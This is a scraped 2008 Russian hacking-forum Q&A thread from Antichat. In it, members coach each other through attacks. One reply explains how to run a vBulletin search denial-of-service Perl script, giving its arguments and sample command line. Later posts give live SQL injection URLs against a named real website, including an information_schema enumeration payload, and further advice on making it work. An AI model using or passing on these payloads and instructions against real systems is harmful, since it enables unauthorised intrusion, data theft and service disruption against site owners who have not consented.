Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
[Задай Вопрос - Получи Ответ] |
12.08.2008, 16:41
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523
Репутация:
1174
|
|
[Задай Вопрос - Получи Ответ]
Внимание! Данная тема предназначена для Ваших вопросов. Создавать темы, посвященные какому - либо вопросу - не нужно, все спрашиваем тут, в переделах тематики раздела. Созданные темы, содержащие вопрос будут удаляться, как оффтоп
Последний раз редактировалось ZAMUT; 12.08.2008 в 18:33..
|
|
|
13.08.2008, 18:15
|
|
Участник форума
Регистрация: 27.08.2006
Сообщений: 223
Провел на форуме:
2154209
Репутация:
341
|
|
Выложили Dos скрипт для Vbulletin, но я никак не могу разобраться для какой он версии и какие параметры должны быть, чтобы он сработал. Поможете?(Там идет нагрузка на поиск, но это же вроде старьё, и Jelsoft давно это все фиксануло)
http://forum.antichat.ru/showpost.php?p=811052&postcount=48
|
|
|
|
13.08.2008, 22:22
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
Сообщение от ReanimatoR
Выложили Dos скрипт для Vbulletin, но я никак не могу разобраться для какой он версии и какие параметры должны быть, чтобы он сработал. Поможете?(Там идет нагрузка на поиск, но это же вроде старьё, и Jelsoft давно это все фиксануло)
http://forum.antichat.ru/showpost.php?p=811052&postcount=48
1. Насчет версии, тут наверное гугл лучший помощник: вбиваешь кусок текста из сплоента (лучше тот, где идет формирование отправляемого пакета) в гугл и смотришь на заголовки тем в которых нашелся этот сплоент (к сожалению не могу с жопореза нормально просмотреть сайты), но заметил что даты постов с этим сплойтом идут за 2006-2007 год, т.е. он явно старенький и скорее всего не актуальный в новых версиях.
2. Какие параметры?, это видно из исходника сплоента:
Код:
if (@ARGV < 2) { &usage; }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
Два параметра - хост и директория с форумом, т.е. запускать так:
perl c:/1.pl www.test1.ru /forum /
Обрати внимание имя директории с форумом должно быть вместе с двумя слешами (в начале и конце имени), это видно по тому как формируется пакет:
Код:
$foo = "POST ".$dir."search.php HTTP/1.1\r\n".
А если форум находится в корне сайта, то вторым параметром должен быть просто слеш.
P.S. по поводу того что это старье - тут нечему удивлятся, тем кто копипастит всё это глубого побарабану новое оно или старое, а про описание я вообще промолчу.
Последний раз редактировалось Grey; 13.08.2008 в 22:28..
|
|
|
|
14.08.2008, 08:48
|
|
Постоянный
Регистрация: 06.10.2007
Сообщений: 681
Провел на форуме:
3899205
Репутация:
429
|
|
гугл сказал что это для версии vBulletin <= 3.6.3
|
|
|
|
14.08.2008, 14:12
|
|
Новичок
Регистрация: 12.08.2008
Сообщений: 2
Провел на форуме:
6678
Репутация:
1
|
|
всем хай,научите новичка sql инъекции... плиз
|
|
|
|
14.08.2008, 14:31
|
|
Moderator - Level 7
Регистрация: 22.09.2006
Сообщений: 531
Провел на форуме:
3818187
Репутация:
369
|
|
по моему самый лучший мануал по Скулям http://forum.antichat.ru/showthread.php?t=43966
юзай поиск то
|
|
|
|
14.08.2008, 16:33
|
|
Новичок
Регистрация: 14.08.2008
Сообщений: 3
Провел на форуме:
6327
Репутация:
0
|
|
Привет всем 
Подскажите как можно узнать префикс таблиц на атакуемом сайте?
вот ссылочка:http://www.hardvision.ru/index.php3 to=files&action=showCateg&cid=-233+union+select+1,2,3+from+har_user/*
там проходит sql инъекция , как ни пробовал по логики от названия сайта , не получается.
Может есть какие команды? |
|
|
|
14.08.2008, 17:10
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от viv
Привет всем
Подскажите как можно узнать префикс таблиц на атакуемом сайте?
вот ссылочка:http://www.hardvision.ru/index.php3 to=files&action=showCateg&cid=-233+union+select+1,2,3+from+har_user/*
там проходит sql инъекция , как ни пробовал по логики от названия сайта , не получается.
Может есть какие команды? Там пятая ветка , вся информация в schema:
http://www.hardvision.ru/index.php3?to=files&action=showCateg&cid=-233+union+select+1,table_name,3+from+information_s chema.tables+limit+17,1/*
|
|
|
|
14.08.2008, 17:20
|
|
Новичок
Регистрация: 14.08.2008
Сообщений: 3
Провел на форуме:
6327
Репутация:
0
|
|
Попробовал ввел Вашу строчку , но ни чего не отобразилось, нет префикса
|
|
|
|
14.08.2008, 17:25
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от viv
Попробовал ввел Вашу строчку , но ни чего не отобразилось, нет префикса
1 Читать статьи
2 Убрать пробелы из урла
3 Префикс к чему? В schema находится ВСЯ информация обо ВСЕХ таблицах и колонках
К посту ниже:
Выполни Все рекоммендации
Последний раз редактировалось jokester; 14.08.2008 в 18:19..
Причина: Дополнил
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид